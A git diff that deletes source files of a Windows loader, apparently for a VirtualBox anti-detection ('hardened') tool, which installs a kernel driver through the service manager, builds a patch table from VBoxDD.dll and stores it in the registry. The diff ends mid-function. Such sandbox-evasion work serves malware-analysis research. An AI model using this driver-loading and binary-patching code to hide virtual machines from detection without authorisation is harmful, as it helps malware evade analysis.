-WCHAR g_BE = 0xFEFF;
-
-/*
-* cuiInitialize
-*
-* Purpose:
-*
-* Initialize console input/output.
-*
-*/
-VOID cuiInitialize(
- _In_ BOOL InitInput,
- _Out_opt_ PBOOL IsConsoleOutput
-)
-{
- ULONG dummy;
-
- g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
-
- if (InitInput) g_ConIn = GetStdHandle(STD_INPUT_HANDLE);
-
- SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
-
- g_ConsoleOutput = TRUE;
- if (!GetConsoleMode(g_ConOut, &dummy)) {
- g_ConsoleOutput = FALSE;
- WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL);
- }
-
- if (IsConsoleOutput)
- *IsConsoleOutput = g_ConsoleOutput;
-
- return;
-}
-
-/*
-* cuiClrScr
-*
-* Purpose:
-*
-* Clear screen.
-*
-*/
-VOID cuiClrScr(
- VOID
-)
-{
- COORD coordScreen;
- DWORD cCharsWritten;
- DWORD dwConSize;
- CONSOLE_SCREEN_BUFFER_INFO csbi;
-
- coordScreen.X = 0;
- coordScreen.Y = 0;
-
- if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
- return;
-
- dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
-
- if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '),
- dwConSize, coordScreen, &cCharsWritten))
- return;
-
- if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
- return;
-
- if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes,
- dwConSize, coordScreen, &cCharsWritten))
- return;
-
- SetConsoleCursorPosition(g_ConOut, coordScreen);
-}
-
-/*
-* cuiPrintTextA
-*
-* Purpose:
-*
-* Output text to the console or file.
-* ANSI version.
-*
-*/
-VOID cuiPrintTextA(
- _In_ LPSTR lpText,
- _In_ BOOL UseReturn
-)
-{
- SIZE_T consoleIO;
- DWORD bytesIO;
- LPSTR Buffer;
-
- if (lpText == NULL)
- return;
-
- consoleIO = _strlen_a(lpText);
- if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
- return;
-
- consoleIO = 5 + consoleIO;
- Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
- if (Buffer) {
-
- _strcpy_a(Buffer, lpText);
- if (UseReturn) _strcat_a(Buffer, "\r\n");
-
- consoleIO = _strlen_a(Buffer);
-
- if (g_ConsoleOutput != FALSE) {
- WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
- }
- else {
- WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
- }
- HeapFree(GetProcessHeap(), 0, Buffer);
- }
-}
-
-/*
-* cuiPrintTextW
-*
-* Purpose:
-*
-* Output text to the console or file.
-* UNICODE version.
-*
-*/
-VOID cuiPrintTextW(
- _In_ LPWSTR lpText,
- _In_ BOOL UseReturn
- )
-{
- SIZE_T consoleIO;
- DWORD bytesIO;
- LPWSTR Buffer;
-
- if (lpText == NULL)
- return;
-
- consoleIO = _strlen_w(lpText);
- if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
- return;
-
- consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
- Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
- if (Buffer) {
-
- _strcpy(Buffer, lpText);
- if (UseReturn) _strcat_w(Buffer, TEXT("\r\n"));
-
- consoleIO = _strlen_w(Buffer);
-
- if (g_ConsoleOutput != FALSE) {
- WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
- }
- else {
- WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
- }
- HeapFree(GetProcessHeap(), 0, Buffer);
- }
-}
-
-/*
-* cuiPrintTextLastErrorA
-*
-* Purpose:
-*
-* Output LastError translated code to the console or file.
-* ANSI version.
-*
-*/
-VOID cuiPrintTextLastErrorA(
- _In_ BOOL UseReturn
- )
-{
- CHAR szTextBuffer[512];
- DWORD dwLastError = GetLastError();
-
- FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPSTR)&szTextBuffer, 512, NULL);
- cuiPrintTextA(szTextBuffer, UseReturn);
-}
-
-/*
-* cuiPrintTextLastErrorW
-*
-* Purpose:
-*
-* Output LastError translated code to the console or file.
-* UNICODE version.
-*
-*/
-VOID cuiPrintTextLastErrorW(
- _In_ BOOL UseReturn
-)
-{
- WCHAR szTextBuffer[512];
- DWORD dwLastError = GetLastError();
-
- FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPWSTR)&szTextBuffer, 512, NULL);
- cuiPrintTextW(szTextBuffer, UseReturn);
-}
diff --git a/Source/Zekamashi/loader/cui.h b/Source/Zekamashi/loader/cui.h
deleted file mode 100644
index 229124f..0000000
--- a/Source/Zekamashi/loader/cui.h
+++ /dev/null
@@ -1,55 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2016 - 2018
-*
-* TITLE: CUI.H
-*
-* VERSION: 1.30
-*
-* DATE: 01 Aug 2018
-*
-* Common header file for console ui.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#pragma once
-
-VOID cuiInitialize(
- _In_ BOOL InitInput,
- _Out_opt_ PBOOL IsConsoleOutput
- );
-
-#ifdef _UNICODE
-#define cuiPrintText cuiPrintTextW
-#define cuiPrintTextLastError cuiPrintTextLastErrorW
-#else
-#define cuiPrintText cuiPrintTextA
-#define cuiPrintTextLastError cuiPrintTextLastErrorA
-#endif
-
-
-VOID cuiPrintTextA(
- _In_ LPSTR lpText,
- _In_ BOOL UseReturn
- );
-
-VOID cuiPrintTextW(
- _In_ LPWSTR lpText,
- _In_ BOOL UseReturn
- );
-
-VOID cuiPrintTextLastErrorA(
- _In_ BOOL UseReturn
- );
-
-VOID cuiPrintTextLastErrorW(
- _In_ BOOL UseReturn
- );
-
-VOID cuiClrScr(
- VOID
- );
diff --git a/Source/Zekamashi/loader/global.h b/Source/Zekamashi/loader/global.h
deleted file mode 100644
index 3b2667f..0000000
--- a/Source/Zekamashi/loader/global.h
+++ /dev/null
@@ -1,53 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2014 - 2019
-*
-* TITLE: GLOBAL.H
-*
-* VERSION: 1.100
-*
-* DATE: 04 Jan 2019
-*
-* Common header file for the program support routines.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-//disable nonmeaningful warnings.
-#pragma warning(disable: 4005) // macro redefinition
-#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
-
-#if !defined UNICODE
-#error ANSI build is not supported
-#endif
-
-#if defined (_MSC_VER)
-#if (_MSC_VER >= 1900) //VS15, 17 etc
-#ifdef _DEBUG
-#pragma comment(lib, "vcruntimed.lib")
-#pragma comment(lib, "ucrtd.lib")
-#else
-#pragma comment(lib, "libucrt.lib")
-#pragma comment(lib, "libvcruntime.lib")
-#endif
-#endif
-#endif
-
-#include
-#include
-#include "ntos.h"
-#include "minirtl\minirtl.h"
-#include "minirtl\cmdline.h"
-#include "sup.h"
-#include "cui.h"
-#include "patterns.h"
-#include "instdrv.h"
-
-#define TSUGUMI_IOCTL_REFRESH_LIST CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0700, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
-#define TSUGUMI_IOCTL_MONITOR_STOP CTL_CODE(FILE_DEVICE_UNKNOWN, 0x0701, METHOD_BUFFERED, FILE_SPECIAL_ACCESS)
-#define TSUGUMI_SYM_LINK L"\\\\.\\Tsugumi"
-#define TSUGUMI_DRV_NAME L"Tsugumi.sys"
-#define TSUGUMI_DISP_NAME L"Tsugumi"
diff --git a/Source/Zekamashi/loader/instdrv.c b/Source/Zekamashi/loader/instdrv.c
deleted file mode 100644
index 4335451..0000000
--- a/Source/Zekamashi/loader/instdrv.c
+++ /dev/null
@@ -1,256 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
-*
-* TITLE: INSTDRV.C
-*
-* VERSION: 1.81
-*
-* DATE: 20 Mar 2017
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#include "global.h"
-
-/*
-* scmInstallDriver
-*
-* Purpose:
-*
-* Create SCM service entry describing kernel driver.
-*
-*/
-BOOL scmInstallDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName,
- _In_opt_ LPCTSTR ServiceExe
-)
-{
- SC_HANDLE schService;
-
- schService = CreateService(SchSCManager, // SCManager database
- DriverName, // name of service
- DriverName, // name to display
- SERVICE_ALL_ACCESS, // desired access
- SERVICE_KERNEL_DRIVER, // service type
- SERVICE_DEMAND_START, // start type
- SERVICE_ERROR_NORMAL, // error control type
- ServiceExe, // service's binary
- NULL, // no load ordering group
- NULL, // no tag identifier
- NULL, // no dependencies
- NULL, // LocalSystem account
- NULL // no password
- );
- if (schService == NULL) {
- return FALSE;
- }
-
- CloseServiceHandle(schService);
- return TRUE;
-}
-
-/*
-* scmStartDriver
-*
-* Purpose:
-*
-* Start service, resulting in SCM drvier load.
-*
-*/
-BOOL scmStartDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
-)
-{
- SC_HANDLE schService;
- BOOL ret;
-
- schService = OpenService(SchSCManager,
- DriverName,
- SERVICE_ALL_ACCESS
- );
- if (schService == NULL)
- return FALSE;
-
- ret = StartService(schService, 0, NULL)
- || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
-
- CloseServiceHandle(schService);
-
- return ret;
-}
-
-/*
-* scmOpenDevice
-*
-* Purpose:
-*
-* Open driver device by symbolic link.
-*
-*/
-BOOL scmOpenDevice(
- _In_ LPCTSTR DriverName,
- _Inout_opt_ PHANDLE lphDevice
-)
-{
- TCHAR completeDeviceName[64];
- HANDLE hDevice;
-
- RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
- wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
-
- hDevice = CreateFile(completeDeviceName,
- GENERIC_READ | GENERIC_WRITE,
- 0,
- NULL,
- OPEN_EXISTING,
- FILE_ATTRIBUTE_NORMAL,
- NULL
- );
- if (hDevice == INVALID_HANDLE_VALUE)
- return FALSE;
-
- if (lphDevice) {
- *lphDevice = hDevice;
- }
- else {
- CloseHandle(hDevice);
- }
-
- return TRUE;
-}
-
-/*
-* scmStopDriver
-*
-* Purpose:
-*
-* Command SCM to stop service, resulting in driver unload.
-*
-*/
-BOOL scmStopDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
-)
-{
- BOOL ret;
- INT iRetryCount;
- SC_HANDLE schService;
- SERVICE_STATUS serviceStatus;
-
- ret = FALSE;
- schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
- if (schService == NULL) {
- return ret;
- }
-
- iRetryCount = 5;
- do {
- SetLastError(0);
-
- ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
- if (ret != FALSE)
- break;
-
- if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
- break;
-
- Sleep(1000);
- iRetryCount--;
- } while (iRetryCount);
-
- CloseServiceHandle(schService);
-
- return ret;
-}
-
-/*
-* scmRemoveDriver
-*
-* Purpose:
-*
-* Remove service entry from SCM database.
-*
-*/
-BOOL scmRemoveDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
-)
-{
- SC_HANDLE schService;
- BOOL bResult = FALSE;
-
- schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
- if (schService) {
- bResult = DeleteService(schService);
- CloseServiceHandle(schService);
- }
- return bResult;
-}
-
-/*
-* scmUnloadDeviceDriver
-*
-* Purpose:
-*
-* Combines scmStopDriver and scmRemoveDriver.
-*
-*/
-BOOL scmUnloadDeviceDriver(
- _In_ LPCTSTR Name
-)
-{
- SC_HANDLE schSCManager;
- BOOL bResult = FALSE;
-
- if (Name == NULL) {
- return bResult;
- }
-
- schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
- if (schSCManager) {
- scmStopDriver(schSCManager, Name);
- bResult = scmRemoveDriver(schSCManager, Name);
- CloseServiceHandle(schSCManager);
- }
- return bResult;
-}
-
-/*
-* scmLoadDeviceDriver
-*
-* Purpose:
-*
-* Unload if already exists, Create, Load and Open driver instance.
-*
-*/
-BOOL scmLoadDeviceDriver(
- _In_ LPCTSTR Name,
- _In_opt_ LPCTSTR Path,
- _Inout_opt_ PHANDLE lphDevice
-)
-{
- SC_HANDLE schSCManager;
- BOOL bResult = FALSE;
-
- if (Name == NULL) {
- return bResult;
- }
-
- schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
- if (schSCManager) {
- scmRemoveDriver(schSCManager, Name);
- scmInstallDriver(schSCManager, Name, Path);
- bResult = scmStartDriver(schSCManager, Name);
- if ((lphDevice != NULL) && (bResult != FALSE)) {
- bResult = scmOpenDevice(Name, lphDevice);
- }
- CloseServiceHandle(schSCManager);
- }
- return bResult;
-}
diff --git a/Source/Zekamashi/loader/instdrv.h b/Source/Zekamashi/loader/instdrv.h
deleted file mode 100644
index 321e916..0000000
--- a/Source/Zekamashi/loader/instdrv.h
+++ /dev/null
@@ -1,55 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
-*
-* TITLE: INSTDRV.H
-*
-* VERSION: 1.80
-*
-* DATE: 01 Feb 2017
-*
-* Common header file for the program SCM usage.
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-#pragma once
-
-BOOL scmInstallDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName,
- _In_opt_ LPCTSTR ServiceExe
-);
-
-BOOL scmStartDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
-);
-
-BOOL scmOpenDevice(
- _In_ LPCTSTR DriverName,
- _Inout_opt_ PHANDLE lphDevice
-);
-
-BOOL scmStopDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
-);
-
-BOOL scmRemoveDriver(
- _In_ SC_HANDLE SchSCManager,
- _In_ LPCTSTR DriverName
-);
-
-BOOL scmUnloadDeviceDriver(
- _In_ LPCTSTR Name
-);
-
-BOOL scmLoadDeviceDriver(
- _In_ LPCTSTR Name,
- _In_opt_ LPCTSTR Path,
- _Inout_opt_ PHANDLE lphDevice
-);
diff --git a/Source/Zekamashi/loader/loader.vcxproj b/Source/Zekamashi/loader/loader.vcxproj
deleted file mode 100644
index 1223b33..0000000
--- a/Source/Zekamashi/loader/loader.vcxproj
+++ /dev/null
@@ -1,293 +0,0 @@
-
-
-
-
- Debug
- x64
-
-
- ReleaseForSigned
- x64
-
-
- ReleaseSigned
- x64
-
-
- Release
- x64
-
-
-
- {2AFB187B-63FB-40C6-B54C-38D559E5124C}
- Win32Proj
- loader
- loader
- 10.0.17763.0
-
-
-
- Application
- true
- v141
- Unicode
-
-
- Application
- false
- v141
- true
- Unicode
- Spectre
-
-
- Application
- false
- v141
- true
- Unicode
- Spectre
-
-
- Application
- false
- v141
- true
- Unicode
- Spectre
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- true
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
- loader
- AllRules.ruleset
- false
-
-
- false
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
- loader
- NativeRecommendedRules.ruleset
- true
-
-
- false
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
- loader
- NativeRecommendedRules.ruleset
- true
- true
-
-
- false
- .\output\$(Platform)\$(Configuration)\
- .\output\$(Platform)\$(Configuration)\
- loader
- NativeRecommendedRules.ruleset
- true
- false
-
-
-
-
-
- Level4
- Disabled
- WIN32;_DEBUG;_WINDOWS;_SIGNEDBUILD;%(PreprocessorDefinitions)
- CompileAsC
- 4996
- true
- false
-
-
- Console
- true
- VBoxLdrMain
- 6.0
-
-
- oscompat.manifest
-
-
-
-
- Level4
-
-
- Full
- true
- true
- true
- Size
- true
- MultiThreaded
- true
- CompileAsC
-
-
- true
- true
- Guard
- false
-
-
- Console
- false
- true
- true
- 6.0
- RequireAdministrator
- true
- VBoxLdrMain
- true
- /NOCOFFGRPINFO %(AdditionalOptions)
-
-
-
-
- oscompat.manifest
-
-
-
-
- Level4
-
-
- Full
- true
- true
- true
- Size
- true
- MultiThreaded
- true
- CompileAsC
- 4996;28252;28253
- true
- true
- Guard
- _SIGNED_BUILD;%(PreprocessorDefinitions)
- false
-
-
- Console
- false
- true
- true
- 6.0
- RequireAdministrator
- true
- VBoxLdrMain
- true
- /INTEGRITYCHECK /NOCOFFGRPINFO %(AdditionalOptions)
-
-
-
-
- oscompat.manifest
-
-
- \Certs\SignZekamashi64.cmd .\output\$(Platform)\$(Configuration)\loader.exe
-
-
-
-
- Level4
-
-
- Full
- true
- true
- true
- Size
- true
- MultiThreaded
- true
- CompileAsC
- 4996;28252;28253
- true
- true
- Guard
- _SIGNED_BUILD;%(PreprocessorDefinitions)
- false
-
-
- Console
- false
- true
- true
- 6.0
- RequireAdministrator
- true
- VBoxLdrMain
- true
- /NOCOFFGRPINFO %(AdditionalOptions)
-
-
-
-
- oscompat.manifest
-
-
- \Certs\SignZekamashi64.cmd .\output\$(Platform)\$(Configuration)\loader.exe
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- CompileAsC
- CompileAsC
- CompileAsC
- CompileAsC
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/Source/Zekamashi/loader/main.c b/Source/Zekamashi/loader/main.c
deleted file mode 100644
index bab620a..0000000
--- a/Source/Zekamashi/loader/main.c
+++ /dev/null
@@ -1,435 +0,0 @@
-/*******************************************************************************
-*
-* (C) COPYRIGHT AUTHORS, 2014 - 2019
-*
-* TITLE: MAIN.C
-*
-* VERSION: 1.100
-*
-* DATE: 04 Jan 2019
-*
-* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
-* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
-* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
-* PARTICULAR PURPOSE.
-*
-*******************************************************************************/
-
-#include "global.h"
-
-#pragma data_seg("shrd")
-volatile LONG g_lApplicationInstances = 0;
-#pragma data_seg()
-
-#define TsmiParamsKey L"Parameters"
-#define TsmiVBoxDD L"VBoxDD.dll"
-
-#define T_PROGRAMTITLE L"VirtualBox Hardened Loader v1.10.0.1901"
-
-TABLE_DESC g_PatchData = { NULL, 0 };
-
-//
-// Help output.
-//
-#define T_HELP L"Sets parameters for Tsugumi driver.\r\n\r\n\
-Optional parameters to execute: \r\n\r\n\
-LOADER [/s] or [Table]\r\n\r\n\
- /s - stop monitoring and purge system cache.\r\n\
- Table - optional, custom VBoxDD patch table fullpath.\r\n\r\n\
- Example: ldr.exe vboxdd.bin"
-
-/*
-* SetTsmiParams
-*
-* Purpose:
-*
-* Set patch chains data to the registry.
-*
-*/
-BOOL SetTsmiParams(
- VOID
-)
-{
- BOOL cond = FALSE, bResult = FALSE;
- HKEY hRootKey, hParamsKey;
- LRESULT lRet = ERROR_BAD_ARGUMENTS;
-
- hRootKey = NULL;
- hParamsKey = NULL;
-
- do {
-
- lRet = RegCreateKeyEx(HKEY_LOCAL_MACHINE, L"Software\\Tsugumi", 0, NULL, 0, KEY_ALL_ACCESS,
- NULL, &hRootKey, NULL);
-
- if ((lRet != ERROR_SUCCESS) || (hRootKey == NULL)) {
- cuiPrintText(TEXT("Ldr: Cannot create/open Tsugumi key"), TRUE);
- break;
- }
-
- lRet = RegCreateKey(hRootKey, TsmiParamsKey, &hParamsKey);
- if ((lRet != ERROR_SUCCESS) || (hParamsKey == NULL)) {
- cuiPrintText(TEXT("Ldr: Cannot create/open Tsugumi->Parameters key"), TRUE);
- break;
- }
-
- lRet = ERROR_BAD_ARGUMENTS;
- if ((g_PatchData.DDTablePointer) && (g_PatchData.DDTableSize > 0)) {
- lRet = RegSetValueEx(hParamsKey, TsmiVBoxDD, 0, REG_BINARY,
- (LPBYTE)g_PatchData.DDTablePointer, g_PatchData.DDTableSize);
- if (lRet != ERROR_SUCCESS) {
- cuiPrintText(TEXT("Ldr: Cannot write VBoxDD patch table"), TRUE);
- break;
- }
- }
- else {
- RegDeleteValue(hParamsKey, TsmiVBoxDD);
- }
-
- bResult = TRUE;
-
- } while (cond);
-
- if (hRootKey) {
- RegCloseKey(hRootKey);
- }
- if (hParamsKey) {
- RegCloseKey(hParamsKey);
- }
-
- return bResult;
-}
-
-/*
-* FetchCustomPatchData
-*
-* Purpose:
-*
-* Load custom patch table.
-* Returned buffer must be freed with HeapFree after usage.
-*
-*/
-PVOID FetchCustomPatchData(
- _In_ LPWSTR lpFileName,
- _Inout_opt_ PDWORD pdwPatchDataSize
-)
-{
- DWORD dwFileSize;
- HANDLE hFile;
- PVOID DataBuffer = NULL;
-
- LARGE_INTEGER FileSize;
-
- //
- // Validate input parameter.
- //
- if (lpFileName == NULL)
- return NULL;
-
- //
- // Open file with custom patch table.
- //
- hFile = CreateFile(lpFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
- if (hFile == INVALID_HANDLE_VALUE)
- return NULL;
-
- //
- // Get file size for buffer, allocate it and read data.
- //
- RtlSecureZeroMemory(&FileSize, sizeof(LARGE_INTEGER));
- if (GetFileSizeEx(hFile, &FileSize)) {
- dwFileSize = FileSize.LowPart;
- if (dwFileSize > 0 && dwFileSize <= 4096) {
- DataBuffer = (PVOID)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize);
- if (DataBuffer != NULL) {
-
- if (ReadFile(hFile, DataBuffer, dwFileSize, &dwFileSize, NULL)) {
-
- // Check if optional parameter is set and return data size on true.
- if (pdwPatchDataSize != NULL) {
- *pdwPatchDataSize = dwFileSize;
- }
- }
- }
- }
- }
- CloseHandle(hFile);
- return DataBuffer;
-}
-
-/*
-* CreatePatchTable
-*
-* Purpose:
-*
-* Create patch table depending on installed VBox dll.
-*
-*/
-BOOL CreatePatchTable(
- VOID
-)
-{
- BOOL cond = FALSE, bResult = FALSE;
- DWORD dwSize, cch;
- HKEY hKey = NULL;
- LRESULT lRet;
- TCHAR szBuffer[MAX_PATH * 2], szTempFile[MAX_PATH * 2];
-
- do {
-
- lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"),
- 0, KEY_READ, &hKey);
-
- //
- // If key not exists, return FALSE and loader will exit.
- //
- if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
- cuiPrintText(TEXT("Ldr: Cannot open VirtualBox registry key"), TRUE);
- break;
- }
-
- //
- // Read VBox location.
- //
- RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
- dwSize = MAX_PATH * sizeof(TCHAR);
- lRet = RegQueryValueEx(hKey, TEXT("InstallDir"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize);
- if (lRet != ERROR_SUCCESS) {
- cuiPrintText(TEXT("Ldr: Cannot query VirtualBox installation directory"), TRUE);
- break;
- }
-
- _strcat(szBuffer, TEXT("VBoxDD.dll"));
- RtlSecureZeroMemory(szTempFile, sizeof(szTempFile));
- cch = ExpandEnvironmentStrings(TEXT("%temp%\\"), szTempFile, MAX_PATH);
- if ((cch != 0) && (cch < MAX_PATH)) {
- _strcat(szTempFile, L"nyan.dll");
- if (CopyFile(szBuffer, szTempFile, FALSE) == FALSE)
- break;
-
- g_PatchData.DDTablePointer = NULL;
- g_PatchData.DDTableSize = 0;
- if (ProcessVirtualBoxFile(szTempFile, &g_PatchData.DDTablePointer, &g_PatchData.DDTableSize) == 0)
- bResult = TRUE;
-
- DeleteFile(szTempFile);
- }
-
- } while (cond);
-
- if (hKey) {
- RegCloseKey(hKey);
- }
-
- return bResult;
-}
-
-/*
-* SendCommand
-*
-* Purpose:
-*
-* Call Tsugumi driver with IOCTL.
-*
-*/
-VOID SendCommand(
- DWORD dwCmd,
- LPWSTR lpCmd
-)
-{
- ULONG l = 0;
- HANDLE hDevice = INVALID_HANDLE_VALUE;
- WCHAR szBuffer[MAX_PATH * 2];
-
- // Open Tsugumi instance
- hDevice = NULL;
- _strcpy(szBuffer, TSUGUMI_SYM_LINK);
- hDevice = CreateFile(szBuffer,
- GENERIC_READ | GENERIC_WRITE,
- 0, NULL,
- OPEN_EXISTING,
- FILE_ATTRIBUTE_NORMAL,
- NULL
- );
-
- if (hDevice != INVALID_HANDLE_VALUE) {
-
- RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
- _strcpy(szBuffer, TEXT("Ldr: Tsugumi device handle opened = "));
- u64tostr((ULONG_PTR)hDevice, _strend(szBuffer));
- cuiPrintText(szBuffer, TRUE);
-
- DeviceIoControl(hDevice, dwCmd, NULL, 0, NULL, 0, &l, NULL);
-
- RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
- _strcpy(szBuffer, TEXT("Ldr: "));
- _strcat(szBuffer, lpCmd);
- _strcat(szBuffer, TEXT(" request"));
-
- if (l == 1)
- _strcat(szBuffer, TEXT(" successful"));
- else
- _strcat(szBuffer, TEXT(" failed"));
- cuiPrintText(szBuffer, TRUE);
-
- CloseHandle(hDevice);
-
- if (l == 1) {
- //force windows rebuild image cache
- cuiPrintText(TEXT("Ldr: purge system cache"), TRUE);
- supPurgeSystemCache();
- }
-
- }
- else {
- cuiPrintText(TEXT("Ldr: Cannot open Tsugumi device, make sure driver is loaded before running this program"), TRUE);
- }
-}
-
-/*
-* VBoxLdrMain
-*
-* Purpose:
-*
-* Program entry point.
-*
-*/
-void VBoxLdrMain(
- VOID
-)
-{
- BOOL cond = FALSE, bFound = FALSE, bTryVBoxRestart = FALSE;
- LONG x;
- ULONG l = 0, uCmd = 0;
- PVOID DataBufferDD = NULL;
- WCHAR szBuffer[MAX_PATH * 2];
-
- __security_init_cookie();
-
- do {
-
- cuiInitialize(FALSE, NULL);
-
- SetConsoleTitle(T_PROGRAMTITLE);
- cuiPrintText(T_PROGRAMTITLE, TRUE);
-
- //
- // Check number of instances running.
- //
- x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
- if (x > 1) {
- break;
- }
-
- //
- // Check OS version.
- //
- RtlGetNtVersionNumbers(&l, NULL, NULL);
-
- //
- // We support only Vista based OS.
- //
- if (l < 6) {
- cuiPrintText(TEXT("Ldr: This operation system version is not supported"), TRUE);
- break;
- }
-
- uCmd = TSUGUMI_IOCTL_REFRESH_LIST;
-
- // Parse command line.
- RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
- GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &l);
- if (l > 0) {
-
- if (_strcmpi(szBuffer, TEXT("/?")) == 0) {
- cuiPrintText(T_HELP, TRUE);
- InterlockedDecrement((PLONG)&g_lApplicationInstances);
- ExitProcess(0);
- break;
- }
-
- //check stop flag, if not set check second param
- if (_strcmpi(szBuffer, TEXT("/s")) == 0) {
- uCmd = TSUGUMI_IOCTL_MONITOR_STOP;
- SendCommand(uCmd, TEXT("TSUGUMI_IOCTL_MONITOR_STOP"));
- break;
- }
- else {
- l = 0;
- DataBufferDD = FetchCustomPatchData(szBuffer, &l);
- if ((DataBufferDD != NULL) && (l > 0)) {
- g_PatchData.DDTablePointer = DataBufferDD;
- g_PatchData.DDTableSize = l;
- bFound = TRUE;
- }
- else {
- cuiPrintText(TEXT("Ldr: Error reading file at parameter 1"), TRUE);
- break;
- }
- }
- }
-
- //
- // Check if custom patch table present. If not - attempt to create own. Exit on failure.
- //
- if (bFound == FALSE) {
- bFound = CreatePatchTable();
- if (bFound == FALSE) {
- cuiPrintText(TEXT("Ldr: Could not load patch table"), TRUE);
- break;
- }
- else {
- cuiPrintText(TEXT("Ldr: Patch table created"), TRUE);
- }
- }
-
-#ifndef _DEBUG
- //
- // Check if any VBox instances are running, they must be closed before our usage.
- //
